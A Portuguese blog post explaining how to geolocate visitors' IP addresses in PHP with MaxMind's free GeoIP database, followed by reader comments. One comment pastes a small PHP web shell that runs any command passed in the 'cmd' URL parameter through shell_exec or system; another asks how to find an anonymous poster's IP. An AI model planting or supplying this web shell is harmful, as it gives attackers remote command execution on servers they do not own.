PHP + GeoIP

Tenho recebidos vários pedidos para mostrar como fiz isto, como defendo o open-source só fica bem explicar como fiz e disponibilizar as fontes.

Pode parecer complicado, mas de complicado não tem nada, vou começar com uma pequena introdução que acho que deve ser feita para contextualizar.

Quando um ISP (Fornecedor de Serviços de Internet) nos atribui um endereço de IP, estes não são atribuidos aleatóriamente nem pode ser o que apeteça ao dito ISP, um ISP adquire um seguemento ou vários de endereços de IP, por exemplo neste momento o meu IP é 62.48.228.xxx o meu fornecedor de internet é o “dono” desta gama de ip’s logo outra pessoa que tenha um ip com os mesmos 3 primeiros octetos iguais presumo que o ISP será o mesmo, ou dependendo da quantidade de IP’s que o ISP pode atribuir pode ser com base nos 2 primeiros octetos.

Se existisse uma base de dados que tivesse lá todos os conjuntos de IP’s e os respectivos ISP’s facilmente eu conseguiria dizer que com base no pais de operação do ISP que o cliente está nesse mesmo pais. Existe uma empresa que fornece uma base de dados com estes dados e o melhor de tudo têm uma versão gratuita que pode ser usada sem restrições, essa empresa chama-se MaxMind, esta base de dados é fornecida em 2 formatos CSV e binário, o CSV é muito útil se quisermos por exemplo importar os dados para uma base de dados tipo MySQL, eu estou a usar o formato binário pois o update é mais fácil e só wget e decompactar e está o update da base de dados feito.

A MaxMind disponibiliza exemplos de utilização e API’s em várias linguagens C, C#, PHP, Python, VB.ne, Pascal e Javascript e também um modulo para apache (mod_geoip), módulo para PHP, módulo Perl e para os adeptos do processamento distribuido um objecto COM+.

Penso que o GeoIP já está apresentado agora vou partilhar um exemplo de uso simples com PHP, para começar fazemos download da ultima versão da base de dados que está disponivel aqui.

O exemplo de utilização e acesso à base de dados pode ser visto aqui assim como o seu output que está aqui. No exemplo de utilização estão os comentários que ajudam na leitura do código, podia explicar aqui mas creio que é mais fácil ler os comentários que coloquei no ficheiro, a utilização do HTML é só para embelezar!!

O ficheiro onde estão as funções que permitem isto é distribuido com a extensão .inc costumo renomear sempre para .inc.php para não deixar o código á mostra como por vezes altero esse ficheiro, tenho receio de deixar algum “buraco” exposto.

Este exemplo fica disponivel neste .rar ou naveguem nesta pasta…

A MaxMind fornece ainda outras bases de dados de utilização tão fácil quanto esta para identificar a cidade do IP e outras bases de dados pagas.

6 comentários em “PHP + GeoIP”

  1. é possivel você conhecer o ip de um posto anónimo no blogspot?

  2. hmm, e sobre phpshells e que nos podees dizer?
    ex:

    PHPSHELL BY asasasdasdffgdfgdsdsd

    <?php
    // Indica se existem as funcoes e executa se as mesmas se verificarem verdadeiras : //
    if (function_exists(“shell_exec”)){
    $cmd = strtolower($_GET[‘cmd’]);
    $cmd_command = shell_exec(“$cmd”);
    $escapeshellcmdF = escapeshellcmd($cmd_command);
    print “$escapeshellcmdF”;
    }
    elseif (function_exists(“system”)){
    $cmd = strtolower($_GET[‘cmd’]);
    $cmd_command = system(“$cmd”);
    $escapeshellcmdF = escapeshellcmd($cmd_command);
    print “$escapeshellcmdF”;
    }
    else
    {
    echo “system OFF // shell_exec = OFF”;
    }
    ?>

    esse e um pequeno script em php, mas como nao percebo muito de php, deixo-te esta curiosidade a ti! 😉
    fico por ca a espera de uma resposta, sobre mais desenvolvimentos =)

Os comentários estão fechados.